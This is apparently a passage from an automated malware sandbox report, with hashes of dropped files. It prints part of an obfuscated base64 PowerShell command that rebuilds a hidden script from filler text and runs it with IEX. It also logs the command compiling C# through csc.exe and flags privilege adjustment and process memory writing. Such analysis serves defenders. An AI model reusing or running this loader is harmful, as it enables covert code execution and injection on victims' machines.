BnAFIAZQBzAGwAYQBlAEQAaQBzAGMAbwBQAEgAZQByAG0AZQByAGsAcgBhAHQAZQBpAFAAYQByAG8AbgBuAEEAcgBiAGkAdAB0AEQAdQBhAGwAaQBlAEEAZgBvAHUAbgByAFIAZQBpAG0AYQAoAE0AdQBsAHQAaQBpAFAAbABhAG4AYwBuAFYAZQBuAGUAcwB0AEkAbgB0AGUAcgAgAEUAZgB0AGUAcgBGAEwAdQBjAGkAZgBsAE0AYQB0AHQAZQBhAEQAaQBhAGIAZQBkAFUAbgBvAGIAdgB2AG8AYgBsAGEAdAApAEQAYQBsAG0AYQA7AAoAUgB5AGsAZQAgAFsAUwBrAGEAZwAgAEQAVABhAHUAdABvAGwAQQBuAGEAbAB5AGwAQQBmAHYAbgBuAEkAQQBmAHMAdABpAG0AVABvAHIAdABvAHAAQgBpAGYAaQBnAG8ASABlAGwAcwBlAHIAQQBmAHIAZQB0AHQATgB5AHQAYQBhACgAUgBhAGsAcwBhACIAUwBrAHYAYgBlAHcAQgBlAGcAbwBuAGkAbABkAGkAZwBzAG4AVQBuAGQAZQBtAHMARAByAGkAawBrAHAAcwB5AG4AZwBlAG8AQgByAGEAbgBkAG8AQgBvAGgAYQB3AGwAQwBsAGEAdABjAC4ATABlAGQAZQBrAGQATQBhAGEAbABlAHIAcwBuAGUAcwBlAHYATwBvAGwAbwBnACIARgBvAHIAdAByACkAQQBwAG8AaQBkAF0AcwBrAHIAaQB2AHAASABqAGUAbQBtAHUATwB2AGUAcgBsAGIAUwBpAGwAdgBlAGwASQBuAGYAaQBnAGkARgByAHMAdABlAGMAWgBlAGsAcwAgACAARAB1AG0AbQBrAHMAUwBjAG8AZwBnAHQAQQBsAGwAZQBnAGEAVAByAG8AbQBtAHQAVQBuAHAAbABvAGkAQwB5AGsAZQBsAGMARABlAHYAaQBsACAAQgBsAGEAbgBrAGUATwByAHkAYwB0AHgAdQBuAGQAZQByAHQAQQBjAHQAaQBuAGUAQwByAGkAbQBzAHIAUwB0AG8AcgBtAG4ARgBhAHIAdgBuACAARQBmAGYAdQBsAGkARABvAG0AZQBzAG4AVAB1AHQAdABlAHQAQQByAHIAYQBjACAAUwBuAG8AbABkAEUAVQBkAGYAbAB5AG4ASwByAG8AbwBwAHUAUgBrAGUAaABlAG0AUABsAGUAdQByAFAATQBhAHIAaQB0AHIASABlAHQAZQByAGkAQwBhAGwAdgBhAG4AQQBmAGsAYQBzAHQARABpAGgAZAByAFAAUgBvAGcAZQByAHIATwB2AGUAcgBzAG8ARABlAHMAZQByAGMAVQBuAGIAbwByAGUAQwBhAGwAYwBhAHMAVQBuAGQAZQByAHMAUAByAGkAdgBhAG8ATgBvAHMAbwBnAHIAQQBuAHQAbwBjAHMAUABlAGUAcAB5ACgAZwBlAG4AZQByAGkAVABlAG4AdABvAG4AZgBlAGwAdABsAHQAVABvAGQAZAB5ACAATQBpAHIAaQBuAEwASwBpAGwAZABuAGUARABlAG0AbwBjAGYARgBvAHIAbQB5AHQASwBkAGIAbwBsACwAUABsAGUAagBuAGkAYQBuAHQAZQBuAG4AUwBqAGEAcwBrAHQASABlAHgAZQByACAAUwBwAGwAYQBjAG8AVQBmAG8AcgB1AHYAVABhAG4AeQBhAGUAUwBrAGkAYgBiAHIAUABpAG4AZABlAGcAUwBvAHUAZwBoACwATwBvAGUAYwBpAGkAUwB1AGYAZgByAG4AUAByAGkAbgB0AHQATQBlAGcAYQBwACAARgBsAGEAZwBlAFQAUwB5AG0AZgBvAGUAVABvAHAAcABlAG8AQwBoAHIAbwBtAHIAVQBkAHIAYQBhAGUAQgBvAGwAaQBnAHQATwB2AGUAcgBqACwAVgBlAGcAZQB0AGkASAB5AHMAdABlAG4AQwBsAGEAaQByAHQAQQBuAHQAaQBmACAARgByAHUAdABlAFYAVQBuAHIAbwBzAGEAVQBkAGQAYQBuAG4ASABhAHAAbABvAGQAVQBkAHAAbwBsAG8ARgBvAHIAcwB0AHAARQBjAG8AbgBvACwASABqAHMAcABuAGkAQgB5AHIAYQBhAG4ASwByAHMAZQBsAHQARwBlAG0AbQB1ACAATAB1AHMAawBlAFQATQBhAHIAaQBtAHIAUwBhAHAAcABoAGEARABlAHMAZQByAHYAZgBsAG4AcwBlAGUAbgBvAGUAcgByACwAQwBhAG0AcABoAGkAQgBlAHIAZQBnAG4AcwBtAHIAZQBvAHQAUwB2AGUAagBzACAAUABhAHQAaABvAEYASwByAGkAbQBpAG8ATABlAGcAaQB0AHIAcwBrAGEAbABhADEATQBlAHQAYQBtADMAVQBuAGMAbwBuADkASgB1AGwAZQB0ACwAQQBmAHMAawBlAGkASABlAHIAIABGAG4AUwB2AHIAaQBuAHQAdQBuAGkAdgBlACAARQB1AGYAbwByAE0AcwB0AHIAYQBpAGEAUwBjAGgAbwBvAG4ARwBlAG8AbABvAGcAQgBpAGoAZQBrACkAQwBvAGEAdABpADsACgBNAGEAcgBrAGUAfQAKAEcAbgB1AGUAcgAiAE4AbwBuAGQAaQBAAAoARwB5AHIAYQBsACQAVQBuAHAAdQBsAFEARABlAGwAcABsAHUASwBvAG4AawB5AGkAVABhAHAAZQB0AHIAVgBlAHIAcwBpAGsATQB5AGMAbwB0AHMAVwBhAHIAbABpAG8AQQBjAHQAaQBuADMAUwB0AG8AcgBtAD0AQgBvAHIAZQBtAFsAVQBkAGsAYQBzAFEAUgBhAG4AZwBlAHUATABvAG8AawBzAGkAUwBhAGEAcgBzAHIATQBlAHQAcgBvAGsAUwBwAGkAcgB0AHMARABpAHMAaAB3AG8AUwB0AGUAZwBuADEAQgBpAGwAdABpAF0ARgBvAHIAcwBvADoAWgBvAG8AYwB1ADoAbQB1AHQAYQBmAFYARQBzAHAAaQBuAGkAVQB0AGEAawBuAHIAZwByAGEAcABoAHQAQQByAHYAZQByAHUATAB1AHIAbQByAGEAQwBvAG0AbQBlAGwASwBhAG4AYQByAEEAUABlAHQAcgBhAGwASwBhAGYAZgBlAGwAVQBzAHkAbgBsAG8AUwBhAG4AZABzAGMAUABpAGIAcgBvACgAQQBkAHMAbwByADAAQQBjAGMAZQBsACwARQBwAGUAbQBiADEARwBnAGUAYgBnADAARABhAHQAYQBrADQARABhAHMAawBlADgAQQBsAGQAZQByADUARABqAGkAYgBvADcARQB1AGMAYQBpADYAUABsAGEAZwBzACwAZgBpAHMAawBlADEARQBuAHQAZQByADIAdwBoAGEAcgB2ADIAUABhAGwAbQBlADgATABpAHYAcwBzADgASwB2AGEAcgB0ACwAQQBzAHkAbABjADYAcwBlAG0AaQBiADQAUwBrAGkAcABwACkACgBFAGMAaABpAG4AJABWAGkAcgBrAGUAVgBKAHUAcABlACAAaQBTAHQAaQBnAG4AegBJAG4AdABlAHIAYwBNAHUAcwBzAGEAYQBLAGkAbABkAGUAYwBLAHUAcABvAG4AaABmAHIAbwBrAG8APQBEAHIAZwByAGUAKABCAHIAYQB2AGkARwBIAHkAcABvAGMAZQBDAGgAYQBtAHAAdABEAGUAbAB0AHIALQBoAGUAZABvAG4ASQBzAGsAcgBrAGsAdABVAG4AcQB1AGkAZQBTAG8AZgBmAGkAbQBQAHUAZABzAGUAUABNAGkAZABjAGgAcgBLAG8AbwByAGQAbwBMAGkAdABvAGcAcABnAHIAbgB0AGgAZQBIAHUAbgBkAHIAcgBqAGkAbgBnAGEAdABVAG4AZABlAHIAeQBIAG8AYwBrAGUAIABGAGEAcwBoAGkALQBUAGEAZwB1AGQAUABBAHQAdABhAGMAYQBBAGMAZQB0AHkAdAByAHIAaABhAHQAaABCAGEAbgBrAHMAIABTAG8AcgB0AGUAIgBDAGkAbgBjAGgASABTAGEAZwBmAHIASwBCAGoAZQBtAHUAQwBwAGkAZQB0AGUAVQBCAGUAZwB1AGkAOgB0AHUAcgBuAHUAXABVAG4AZABlAHIAUwBTAHUAYgBlAHQAbwBQAGwAdQBnAGcAZgBzAHkAbgBnAGUAdABCAGUAZABzAHAAdwBMAGUAZwBpAG8AYQBwAGUAZQBwAGUAcgBQAHUAZwBlAG4AZQBMAG8AZwBvAGcAXABIAG8AdQBzAGUAbwBTAGkAZwB0AHYAdgBJAG0AYQBnAGkAZQBQAG8AcgByAHkAcgBTAGEAcABpAGUAYgBTAHAAaQBuAGQAZQBGAGEAawBpAHIAIgBCAHIAbwBkAGUAKQBNAGkAZwBtAGEALgBUAG8AcgBpAGwAUABBAGMAIABUAHIAYQBQAHIAbwBmAHUAbgBTAHQAdQBkAGUAdABBAG0AYQB5ACAAaQBFAG0AYgBhAHIAbAAKAHMAcABvAHIAdAAkAFMAdgBhAGwAZQBoAE0AYwBjAGwAYQBhAEIAZQByACAAUAB2AFMAaQBiAGkAcgBmAHUAbAB2AHMAcgBpAFMAcABpAHIAaQBzAGMAaABhAGUAdAAgAFMAbwBlAGwAdgA9AEQAZQBhAG4AYQAgAEcAcgB1AGYAZgBbAFYAZQBuAHQAZQBTAEgAYQBhAHIAcwB5AFMAZQBsAHMAawBzAFQAYQB1AHIAaQB0AEsAbQBwAGUAaABlAE8AZABvAG4AdABtAFMAZQBtAGkAbgAuAFcAaAB1AHQAdABDAEkAbgBkAHMAawBvAFYAYQBsAGsAeQBuAEcAdQBsAGQAcAB2AE0AYQBuAGcAbABlAEUAbQBwAGwAYQByAGMAZQBsAGkAbwB0AFYAcwBrAGUAdABdAFUAbgBkAGUAcgA6AE4AZwB0AGUAbAA6AEEAZgB2AGEAbgBGAFQAbwBsAGQAcAByAE0AbwBwAGgAZQBvAEEAZAByAGUAcwBtAGIAYQBrAG4AaQBCAFIAaABlAG0AaQBhAEUAZgBmAGUAbQBzAEEAYwBjAGUAcwBlAEIAcgB1AGcAZQA2AFMAdgBpAG4AZQA0AEQAZQBjAGEAcABTAFMAdABlAHYAZQB0AHQAYQBkAGUAYQByAFAAYQBnAGEAbgBpAEEAaQBnAHUAaQBuAEMAbwBuAGYAZQBnAEkAcgBpAGQAZQAoAFQAZQBtAGEAbgAkAEcAYQBsAHYAYQBWAFMAZQBrAHQAZQBpAFAAcgBpAHYAYQB6AEwAYQB0AGkAbgBjAFIAZQBmAGwAZQBhAFUAbgBpAG4AZwBjAEYAbABhAHUAbgBoAEwAZQBqAGYAZgApAAoATQBhAGEAbAB0AFsAUwBhAG4AZwBzAFMARgBvAHIAaABqAHkASABhAGwAbABvAHMARgBsAGwAZQBkAHQATQBhAGgAbwBnAGUAQwBpAHIAYwB1AG0ATABpAHMAdABpAC4ATgB1AGQAaQBzAFIAUgBpAGcAbQBhAHUAUAByAGUAdABlAG4AQwBoAGUAbQBpAHQARABhAG4AbQBhAGkAcAByAG8AdABlAG0ATwB2AGUAcgBkAGUAQgBvAHIAZAB2AC4AdgBpAGMAZQB2AEkAUABsAGkAcwBzAG4AdABlAGwAZQBrAHQAQwByAGUAdABpAGUAYQBrAHMAaQBhAHIAdAByAG8AbgBzAG8AUwBpAGsAcgBlAHAAUwB0AGkAZwBlAFMAUABqAGEAdAB0AGUAcABlAGQAaQBjAHIAaABpAGQAawBhAHYAUAByAGUAcwBhAGkARQBrAHMAcABlAGMAQQBuAHMAdABhAGUAQQBuAHMAdABhAHMAQwBhAG4AbgBlAC4AVABlAHUAdABvAE0AQwBlAGwAZQBiAGEAUwB5AHQAdABlAHIAUwBvAHIAdABzAHMARwBlAG4AYQBuAGgAbABhAGMAZQBkAGEAUwB0AHUAZABlAGwAVABhAGwAZQBuAF0AVQBwAGYAbwBsADoATgBvAG4AZABpADoAYwB1AHYAaQBlAEMAVQBuAGgAZQBlAG8ARgByAG8AbgBkAHAARABhAG4AawAgAHkATQBhAG4AZABhACgAUABhAHAAYQB2ACQASwBqAG8AcgB0AGgAQQBmAHQAZQByAGEARgBvAHIAZABrAHYARABlAHIAZQBsAGYARwByAGkAbABsAGkARgBvAHIAYgByAHMAUwBrAG8AbABkACwAUABvAHIAcABoACAARABlAGIAZQB0ADAARABvAHIAZwBzACwAVQBuAGQAaQBzACAAQQByAGIAZQBqACAAQwBoAHUAYwBrACQARwBhAGIAbwBuAFEATwB2AGUAcgBtAHUAZAB5AHAAbgBvAGkAQQBuAGEAdABvAHIARQBuAGQAbwBuAGsASQBuAHUAcwB0AHMASQBtAGEAZwBpAG8ARwBlAHIAbQBhADMARABpAHMAbwByACwATQBlAHMAbwB0ACAAUABhAHQAaQBlACQARgBvAHIAaABvAGgASAB2AGkAcgB2AGEAVABlAGsAbgBvAHYAQwBvAG0AcABlAGYAUABvAHMAdAB2AGkAUABhAGEAdABhAHMAUwB0AHIAYQB0AC4AQwBhAHIAaQBzAGMAQQBiAGUAcgBzAG8AQgBlAHQAZQBnAHUATgBpAHQAcgBvAG4AUwBvAHAAaABpAHQARABhAHQAYQBsACkAYgBhAHIAYgBhADsACgBUAGEAbABsAGUAWwBTAHUAbABmAG8AUQBSAGQAaAB1AGQAdQBEAHUAZgBmAGUAaQBQAHUAbgB0AGkAcgBBAHgAbwBpAGQAawBPAHAAdAByAGEAcwBUAG8AYQAgAFUAbwBGAG8AcgBmAG8AMQBUAHUAbABsAGkAXQBUAGUAdABlAHIAOgBTAHAAZQBjAGkAOgBIAGUAdABlAHIARQBwAHMAaQB0AHQAbgBHAHIAdQBlAGwAdQBFAGsAcwBhAG0AbQBSAGkAcABwAGwAUwBNAG8AbABvAGMAeQBMAGkAdAB0AGUAcwBNAHkAZQBsAGEAdABJAG4AZQB4AHAAZQB3AGkAbABkACAAbQBTAHcAaQB6AHoATABEAGUAdQB0AGUAbwBPAHAAdABpAG0AYwBFAGMAaABpAG4AYQBSAGUAcABlAG4AbABCAGUAdgBlAHQAZQByAGUAcwB2AGEAcwBGAGEAbABrAGUAQQB2AGUAbABvAHAAKABJAG4AZABzAGsAJABXAGgAYQBsAGUAUQBLAGEAbQBpAGsAdQBBAHMAcABoAHkAaQBGAG8AcgBoAGEAcgBTAHkAbgBlAG4AawBEAGkAbQBpAG4AcwBOAG8AbgBjAGUAbwBFAHIAZQBtAGkAMwBTAGEAZwBmAHIALABaAG8AbwB0AGgAIABTAHQAcgBpAGsAMABVAG4AZABlAHIAKQBGAGUAcgBtAGUAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABGAHIAaQBnAHIAZQBsAHMALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAA1ACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAFAAbABhAGQADQAKAA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp" "c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP"4⤵PID:4704
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5c54e5662cc55770c7663a43251e5df03
SHA163488d9b1b5ea097937ccd72175bf02385e72db0
SHA25643d198de82b88c62eacb3e35c2620ee13d76a41f0b8a63fad595af7101a3f761
SHA512e9038e8314b224bc3455e4a6031877ff3b2322c23350f6134aee5794fa1cad132b4e3b61af120e4ffb197850e44a36e09c6d008833e617267873c1d8b652cebd
-
Filesize
1KB
MD553b0ed43de7405add294ad832617cfcf
SHA118c8545341e3e550787c701fbd610e2d8dcbe0bc
SHA25664ed4f758b000b69f64fad98cb53ce528d5d0b292fc7c3b0fefeb29ae3713245
SHA51247c734f4aeb6c34702c914562b0d05a869713477a9aedd92d34bb321999a823c307894b73827c61a0fab440ec10ffcdfdab62c4516eedd1260d9e4077e00bac2
-
Filesize
1KB
MD584d823528b1a6dad43df7554db52c642
SHA124a70c2417ce3444bb97daa3d0553775274c3861
SHA256180245898f3e1f82261a4cc75ef901ef774f783d69dcd36feb39d371814f93cd
SHA51297c83e6ed22468df31d9c88862b616322138db3171aceedde48b5121d099580681a27d728418dc45f1cf05a0f8b0130ef2157ee61d78e2f0e52be082ca5d7bb8
-
Filesize
369B
MD5a74f7aeb845fe28ba3a8b794bc68e007
SHA1eecc30fcd56ffb532f198f9bb41517084412a488
SHA2563732c3c450dda1c58a0f8afd64b461272c452e0614959900361591c93e7404aa
SHA5122134f974ba0b62af2b1e69f7c0ecf2cce2ac070e9c688fb70de362bee0780b312ea3e1ec3c50d86f06b69f463b6a1100b2ba1e2f0d574313c48f36a925ebe7ec
-
Filesize
652B
MD5859c23e5372efc196be62eaadc004b10
SHA1507c690794b82d1c2539159311795d8df4be3e31
SHA256778d704069969df0993ce58c6b114966eeb31f9ad1406ecc1e75c46249abc821
SHA5120499983eb731cd8334d493e8420c3766f7c306906a18776b33e28e1a8d60697eecf48fcdcf9a59931c324d53bb2f7986690b167a1f854988c2126e5aab46559a